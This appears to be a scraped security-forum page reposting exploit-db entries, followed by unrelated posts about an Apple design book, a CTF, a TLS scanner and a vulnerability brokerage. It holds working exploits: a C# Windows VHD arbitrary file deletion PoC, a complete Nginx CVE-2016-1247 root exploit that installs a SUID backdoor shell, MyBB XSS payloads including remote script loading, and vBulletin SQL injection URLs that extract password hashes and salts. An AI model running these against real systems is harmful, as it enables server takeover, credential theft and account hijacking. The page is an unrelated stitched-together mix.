VhdmpiApplySnapshot And much much more. You get the idea, as far as I can tell none of these calls actually pass OBJ_FORCE_ACCESS_CHECK flag so all would be vulnerable (assuming you can specify the filename suitably). Note this doesn’t need admin rights as we never mount the VHD. However you can’t use it in a sandbox as opening the drive goes through multiple access checks. While deleting files/directories might not seem to be too important you can use it to delete files in ProgramData or Windows\Temp which normally are OWNER RIGHTS locked to the creator. This could then be recreated by the user due to default DACLs and abuse functionality of other services/applications. Proof of Concept: I’ve provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will delete an arbitrary file specified on the command line. It abuses the fact that during VHD creation the kernel will delete the .rct/.mrt files (this limits the poc to Win10 only). So we drop a test.vhd.rct mount point pointing at the target into the same directory and call create. 1) Compile the C# source code file. 2) Execute the poc on Win 10 passing the path to the file to delete. It will check that the file is present and can’t be deleted. 3) It should print that it successfully deleted the file Expected Result: The target file isn’t deleted, the VHD creation fails. Observed Result: The target file is deleted. */ using Microsoft.Win32.SafeHandles; using System; using System.ComponentModel; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; namespace DfscTest { class Program { enum StorageDeviceType { Unknown = 0, Iso = 1, Vhd = 2, Vhdx = 3, VhdSet = 4, } [StructLayout(LayoutKind.Sequential)] struct VirtualStorageType { public StorageDeviceType DeviceId; public Guid VendorId; } enum OpenVirtualDiskFlag { None = 0, NoParents = 1, BlankFile = 2, BootDrive = 4, CachedIo = 8, DiffChain = 0x10, ParentcachedIo = 0x20, VhdSetFileOnly = 0x40, } enum CreateVirtualDiskVersion { Unspecified = 0, Version1 = 1, Version2 = 2, Version3 = 3, } [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] struct CreateVirtualDiskParameters { public CreateVirtualDiskVersion Version; public Guid UniqueId; public ulong MaximumSize; public uint BlockSizeInBytes; public uint SectorSizeInBytes; public uint PhysicalSectorSizeInBytes; [MarshalAs(UnmanagedType.LPWStr)] public string ParentPath; [MarshalAs(UnmanagedType.LPWStr)] public string SourcePath; // Version 2 on public OpenVirtualDiskFlag OpenFlags; public VirtualStorageType ParentVirtualStorageType; public VirtualStorageType SourceVirtualStorageType; public Guid ResiliencyGuid; // Version 3 on [MarshalAs(UnmanagedType.LPWStr)] public string SourceLimitPath; public VirtualStorageType BackingStorageType; } enum VirtualDiskAccessMask { None = 0, AttachRo = 0x00010000, AttachRw = 0x00020000, Detach = 0x00040000, GetInfo = 0x00080000, Create = 0x00100000, MetaOps = 0x00200000, Read = 0x000d0000, All = 0x003f0000 } enum CreateVirtualDiskFlag { None = 0x0, FullPhysicalAllocation = 0x1, PreventWritesToSourceDisk = 0x2, DoNotcopyMetadataFromParent = 0x4, CreateBackingStorage = 0x8, UseChangeTrackingSourceLimit = 0x10, PreserveParentChangeTrackingState = 0x20, } [DllImport("virtdisk.dll", CharSet=CharSet.Unicode)] static extern int CreateVirtualDisk( [In] ref VirtualStorageType VirtualStorageType, string Path, VirtualDiskAccessMask VirtualDiskAccessMask, [In] byte[] SecurityDescriptor, CreateVirtualDiskFlag Flags, uint ProviderSpecificFlags, [In] ref CreateVirtualDiskParameters Parameters, IntPtr Overlapped, out IntPtr Handle ); static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505"); static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B"); static SafeFileHandle CreateVHD(string path) { VirtualStorageType vhd_type = new VirtualStorageType(); vhd_type.DeviceId = StorageDeviceType.Vhd; vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT; CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters(); ps.Version = CreateVirtualDiskVersion.Version1; ps.SectorSizeInBytes = 512; ps.MaximumSize = 100 * 1024 * 1024; IntPtr hDisk; int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk); if (error != 0) { throw new Win32Exception(error); } return new SafeFileHandle(hDisk, true); } static void Main(string[] args) { try { if (args.Length < 1) { Console.WriteLine(@"[USAGE]: poc file\to\delete"); Environment.Exit(1); } string delete_path = Path.GetFullPath(args[0]); if (!File.Exists(delete_path)) { Console.WriteLine("[ERROR]: Specify a valid file to delete"); Environment.Exit(1); } try { File.Delete(delete_path); Console.WriteLine("[ERROR]: Could already delete file, choose one which you normally can't delete"); Environment.Exit(1); } catch { } string vhd_path = Path.GetFullPath("test.vhd"); File.Delete(vhd_path); try { Directory.Delete(vhd_path + ".rct"); } catch { } Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path); string cmdline = String.Format("/C mklink /J \"{0}.rct\" \"{1}\"", vhd_path, args[0]); ProcessStartInfo start_info = new ProcessStartInfo("cmd", cmdline); start_info.UseShellExecute = false; Process p = Process.Start(start_info); p.WaitForExit(); if (p.ExitCode != 0) { Console.WriteLine("[ERROR]: Can't create symlink"); Environment.Exit(1); } using (SafeFileHandle handle = CreateVHD(vhd_path)) { } if (File.Exists(delete_path)) { Console.WriteLine("[ERROR]: Didn't delete arbitrary file"); } else { Console.WriteLine("[SUCCESS]: Deleted arbitary file"); } } catch (Exception ex) { Console.WriteLine("[ERROR]: {0}", ex.Message); } } } } Sursa: https://www.exploit-db.com/exploits/40764/

Nginx (Debian-Based Distributions) - Local Privilege Escalation #!/bin/bash # # Source: http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit # nginxed-root.sh (ver. 1.0) # # CVE-2016-1247 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory. # # --- # This PoC exploit allows local attackers on Debian-based systems (Debian, Ubuntu # etc.) to escalate their privileges from nginx web server user (www-data) to root # through unsafe error log handling. # # The exploit waits for Nginx server to be restarted or receive a USR1 signal. # On Debian-based systems the USR1 signal is sent by logrotate (/etc/logrotate.d/nginx) # script which is called daily by the cron.daily on default installations. # The restart should take place at 6:25am which is when cron.daily executes. # Attackers can therefore get a root shell automatically in 24h at most without any admin # interaction just by letting the exploit run till 6:25am assuming that daily logrotation # has been configured. # # # Exploit usage: # ./nginxed-root.sh path_to_nginx_error.log # # To trigger logrotation for testing the exploit, you can run the following command: # # /usr/sbin/logrotate -vf /etc/logrotate.d/nginx # # See the full advisory for details at: # https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # Video PoC: # https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html # # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/nginxrootsh" PRIVESCLIB="/tmp/privesclib.so" PRIVESCSRC="/tmp/privesclib.c" SUIDBIN="/usr/bin/sudo" function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Ctrl+C pressed" cleanexit 0 } #intro cat <<_eascii_ _______________________________ < Is your server (N)jinxed ? ;o > ------------------------------- \ \ __---__ _- /--______ __--( / \ )XXXXXXXXXXX\v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX\ /XXXXX( )--_ XXXXXXXXXXX\ /XXXXX/ ( O ) XXXXXX \XXXXX\ XXXXX/ / XXXXXX \__ \XXXXX XXXXXX__/ XXXXXX \__----> ---___ XXX__/ XXXXXX \__ / \- --__/ ___/\ XXXXXX / ___--/= \-\ ___/ XXXXXX '--- XXXXXX \-\/XXX\ XXXXXX /XXXXX \XXXXXXXXX \ /XXXXX/ \XXXXXX > _/XXXXX/ \XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- \XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV"" _eascii_ echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m" # Args if [ $# -lt 1 ]; then echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" exit 3 fi # Priv check echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m" id | grep -q www-data if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f $ERRORLOG ]; then echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n" exit 3 fi # [ Exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the log file rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`" # Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered curl http://localhost/ >/dev/null 2>/dev/null # Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily # rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am) echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..." while :; do sleep 1 if [ -f /etc/ld.so.preload ]; then echo $PRIVESCLIB > /etc/ld.so.preload rm -f $ERRORLOG break; fi done # /etc/ld.so.preload should be owned by www-data user at this point # Inject the privesc.so shared library to escalate privileges echo $PRIVESCLIB > /etc/ld.so.preload echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`" echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" chmod 755 /etc/ld.so.preload # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" sudo 2>/dev/null >/dev/null # Check for the rootshell ls -l $BACKDOORPATH ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi rm -f $ERRORLOG echo > $ERRORLOG # Use the rootshell to perform cleanup that requires root privilges $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" # Reset the logging to error.log $BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`" # Execute the rootshell echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -i # Job done. cleanexit 0 Sursa: https://www.exploit-db.com/exploits/40768/

MyBB 1.8.6 - Cross-Site Scripting Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyBB 1.8.6 Fixed in: 1.8.7 Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip Vendor Website: http://www.mybb.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it contains various XSS vulnerabilities, some of which are reflected and some of which are persistent. Some of them depend on custom forum or server settings. These issues may lead to the injection of JavaScript keyloggers, injection of content such as ads, or the bypassing of CSRF protection, which would for example allow the creation of a new admin user. 3. Details XSS 1: Persistent XSS - Signature CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The profile editor of the moderator control panel does not properly encode the signature of a user when editing it. Because of this, a user can create a specifically crafted signature and - once a moderator or admin visits the profile editor for that user - the injected code will be executed in the context of the victims browser. Proof of Concept: Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=editprofile&uid=[USER_ID] As signature, use: </textarea><img src=no onerror=alert(1)> XSS 2: Persistent XSS - Forum Post (depending on forum settings) CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: An admin can allow HTML input for specific forums via the setting allowhtml. There are various filters in place which intend to make this safe, which may leave the admin with the impression that it is indeed safe. However, there are various possibilities to bypass these filters, mainly using HTML5 features. Proof of Concept: <body onpageshow=alert(1)> -> Visiting the post will trigger the code <div contextmenu="mymenu" oncontextmenu=alert(1)>context menu</pre> -> A right-click will trigger the code <form action=""> Enter something: <input type="text" name ="myinput" oninput="alert(1)"><br> <input type="submit" value="Submit"> </form> -> Input into the field will trigger the code <form action=""> <input type= "text" name="myinput" oninvalid="alert(1)" required> <input type="submit" value ="Submit"> </form> -> A click on submit will trigger the code There are various other attributes which may also work, such as onsearch, onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such as onMouseOver or onFocus are filtered out. XSS 3: Persistent XSS - Username (depending on forum settings) CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: The username is echoed unencoded in the user area. As the login does not have CSRF protection and as an admin can be logged into the admin area with a different account than the one they are logged into the forum, a persistent XSS vulnerability in the user area can be exploited. However, successful exploitation most likely requires a username length of at least 43 characters, which is more than the default settings allow. Simple Proof of Concept: 1. register user with name f" onmouseover="alert(1)" b=" 2. login and visit http://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar The simple proof of concept can be improved to allow successful exploitation. It is not required for the victim to hover over the avatar or interact with the webpage in any way: 1. As username, use: f" onerror="alert(1)" b=" 2. Set an avatar, and use a URL as source (not an image upload) 3. Delete the image from the remote host, making it unavailable, thus triggering an error and executing the injected code. Possible Payloads: Loading a script with vanilla javascript takes a lot more characters than are allowed in a username by default: "onerror="s=document.createElement('script');s.src='http://localhost/s.js'; document.getElementById('top').appendChild(s)" As jQuery is loaded, this can be optimized: "onerror="$.getScript('http://aa.bc/s.js') Executing the payload for a victim: The attack does not require the victim to not be logged in as normal user, as one can login even when already logged in. The login as a normal user also does not affect the login as admin. Thus, an attacker could use the following payload to log a victim in and redirect them to the site containing the payload: <iframe id="myframe" style="display: none" name="myframe" src="about:blank"></ iframe> <form method="post" action="http://localhost/mybb_1805/Upload/ member.php" target="myframe" id="myform" name="myform"> <input name="action" type="hidden" value="do_login" /> <input name="url" type="hidden" value="http:/ /localhost/mybb_1805/Upload/usercp.php" /> <input name="quick_login" type= "hidden" value="1" /> <input name="quick_username" type="hidden" value= ""onerror="$.getScript('http://localhost/s.js')" /> <input name= "quick_password" type="hidden" value="123456" /> <input name="quick_remember" type="hidden" value="yes" /> </form> <script>document.myform.submit();</script> It will automatically log the victim in and redirect them to the page that triggers the script execution. No action of the victim is required. The loaded script could for example perform a backup of the database and then send the attacker the name of the backup, as backups are stored in a public directory. XSS 4: Persistent XSS - Post Attachment (depending on server settings) CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: Attachments are uploaded to a public directory, and their extension is changed to .attach. Files with extension .attach that contain HTML code are interpreted as HTML files by some default server configurations (for example Apache). Additionally, the directory where the files are uploaded to does not prevent directory listing via an index.html file as all the other directories of MyBB do. Because of this, an attacker can find the name of the file and send it to a victim. Once the victim visits the link, the JavaScript code in the file would execute. Proof of Concept: 1. upload HTML file containing <html><body><script>alert(1);</script></body></ html> 2. find file located at /mybb_1805/Upload/uploads/YYYMM/ RANDOM_STRING.attach. The YYYMM directory is not protected against directory browsing via an index.php or index.html file like most other directories of MyBB, which means depending on the server configuration, the file can easily be found 3. send admin there XSS 5: Reflected XSS - Account Activation CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The account activation form echoes a given code unencoded to the user, resulting in reflected XSS. Proof of Concept: http://localhost/mybb_1806/Upload/member.php?action=activate&uid=-1&code="> <script>alert(1)<%2fscript> XSS 6: Reflected XSS - Update (depending on locked state) CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: In many of the update scripts, POST values are echoed without proper encoding. The scripts are upgrade3.php, upgrade12.php, upgrade13.php, upgrade17.php, and upgrade30.php. As this attack only works when the forum is disabled, the forum itself cannot be attacked, but the attack could be used to attack other software hosted on the same domain. Proof of Concept: <form id="myForm" action="http://localhost/mybb_1805/Upload/install/ upgrade.php" method="POST"> <input name="action" value="30_dbchanges_ip"> <input name="iptask" value="5"> <input name="iptable" value="7"> <input name= "ipstart" value="<script>alert(1)</script>"> <input type="submit" value= "Submit"> </form> <script> document.getElementById("myForm").submit(); </ script> XSS 7: Reflected CSS Injection CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: When displaying an error, MyBB echoes user input in a style context, allowing an attacker to inject CSS. With this, it may be possible to change the look of the website or extract information, and it may lead to XSS in older browsers. Proof of Concept: This script submits a search, which will trigger an SQL error because of the non-existing author. All it does then is change the background color of the error report to black to show the existence of the injection: <form id="myForm" action="http://localhost/mybb_1805/Upload/search.php/) ; } %23error { background: %23000000; } /*" method="POST"> <input name="action" value="do_search"> <input name="author" value="nonexistentauthor"> <input name= "matchusername" value="1"> </form> <script> document.getElementById ("myForm").submit(); </script> 4. Solution To mitigate this issue please upgrade at least to version 1.8.7: http://resources.mybb.com/downloads/mybb_1807.zip Please note that a newer version might already be available. 5. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases fix 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyBB-186-XSS-160.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany Sursa: https://www.exploit-db.com/exploits/40749/

vBulletin 4.2.3 - 'ForumRunner' SQL Injection ################################################################################################## #Exploit Title : vBulletin <= 4.2.3 SQL Injection (CVE-2016-6195) #Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046) #Date : 25/08/2015 #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi #Tested At : Indishell Lab(originally developed by Dantalion) ################################################################################################## //////////////////////// /// Overview: //////////////////////// VBulletin version 3.6.0 through 4.2.3 are vulnerable to SQL injection vulnerability in vBulletin core forumrunner addon. Vulnerability was analized and documented by Dantalion (https://enumerated.wordpress.com/2016/07/11/1/) so credit goes to Dantalion only :) //////////////// /// POC //// /////////////// SQL Injection payload to enumerate table names ---------------------------------------------- http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- - SQL Injection payload to enumerate column names from table "user" ---------------------------------------------------------------- http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- - SQL Injection payload to enumerate username,password hash and salt from "user" table ---------------------------------------------------------------------------------- http://forum_directory//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- - ///////////////// exploit code ends here --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Sursa: https://www.exploit-db.com/exploits/40751/

Apple’s latest product is a $300 picture book of its hardware designs Designed by Apple in California is for people who love pictures of phones. ANDREW CUNNINGHAM - 11/15/2016, 6:23 PM Move over, MacBook Pro—there's a new Apple book in town. It's called Designed by Apple in California, and it's a coffee table book filled with pictures of Apple's hardware. The book, like so many other Apple products, is available in two sizes: a 10.20" by 12.75" "Small" version that sells for $199 and a 13" by 16.25" "Large" version that costs $300. The book is only a partial history of design at Apple, and it would be better described as a portfolio of Jony Ive's work. It starts in 1998 with the iMac and ends in 2015 with the Apple Pencil, and it doesn't just cover the successful designs—oddball one-offs like the G4 Cube are in there, too. The linen-bound book is "printed on specially milled, custom-dyed paper with gilded matte silver edges, using eight color separations and low-ghost ink" and "was developed over an eight-year period." Jony Ive is still a part of Apple's executive team and he still occasionally gives interviews and narrates product videos, but in recent years, he seems to have scaled back his role at the company. In mid-2015, he handed off his "day-to-day managerial responsibilities" to Industrial Design VP Richard Howarth and User Interface Design VP Alan Dye. If the book included inside stories about the design of the products it chronicles, it might be an interesting read—as it is, it's only going to appeal to people who want to pay a lot of money to stare at lovingly rendered phones and laptops. It will be on display at Apple's retail stores, where you can idly leaf through it as you wait for your Genius Bar appointment to start. Sursa: http://arstechnica.com/apple/2016/11/apples-latest-product-is-a-300-picture-book-of-its-hardware-designs/

Acelasi tip: http://www.theregister.co.uk/2015/12/17/press_backspace_28_times_to_own_any_grubby_linux_box/

Deci trimiti ceva pachete cu Destination unreachable / port unreachable si gata, crapa? In ce an suntem, '97?

In sfarsit a luat cineva si ultimul flag.

Te referi la cum sa executi comezi, flag-ul 9? Pe cele de dinainte le ai?

Trebuia sa mai stai Haideti, bagati ultimul flag ca e usor.

Salut, In cadrul Defcamp, SecureWorks a sustinut un concurs de tip CTF cu 10 challenges. Concursul este inca online (si va mai fi o perioada scurta). Pentru cei dornici sa exerseze, il puteti gasi aici: https://ariadne.def.camp/ Daca aveti intrebari, le puteti posta aici.

DeepViolet is a TLS/SSL scanning API written in Java. To keep DeepViolet easy to use, identify bugs, reference implementations have been developed that consume the API. If you want to see what DeepViolet can do, use it from the command line in your scripts or use the graphical tool from the comfort of your desktop. Both tools can be used to scan HTTPS web servers to check server certificate trust chains, revocation status, check certificates for pending expiration, weak signing algorithms and much more. Some of the benefits and features for this tool is: Assess revocation status Certificates signed with weak signing algorithms Weak cipher suits on the web server Warn on certificates with approaching expiration View X.509 certificate metadata Easily visualize X.509 trust chains Explore trust chains, flag self-signed roots Information to support forensics You can read more and download this tool over here: https://github.com/spoofzu Sursa: http://www.sectechno.com/deepviolet-tool-for-introspection-of-ssltls-sessions/

Turn Your Vulnerabilities into Advantages SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries. SSD helps security researchers from all over the world to take the next step toward getting properly compensated for their efforts. We work with some of the brightest and most highly compensated people in the security industry and can help you advance your game - regardless of whether you are a beginner or have been discovering security issues for years. The process is simple; send us a brief description of a vulnerability you have discovered and Securiteam Secure Disclosure will act as your agent. With just a sentence or two description from you, we'll use our extensive contacts with vulnerability buyers to secure a list of potential purchasers. You then set a price for your vulnerability and we'll help negotiate a sale. SSD also ensures that the transaction is confidential or that you get full recognition, it's up to you. Your work is valuable and SSD will help you get the compensation you deserve. For more information, contact ssd[at]beyondsecurity.com Take a look at recently published work from SSD: https://blogs.securiteam.com/index.php/archives/category/securiteam-secure-disclosure More info: http://www.beyondsecurity.com/ssd.html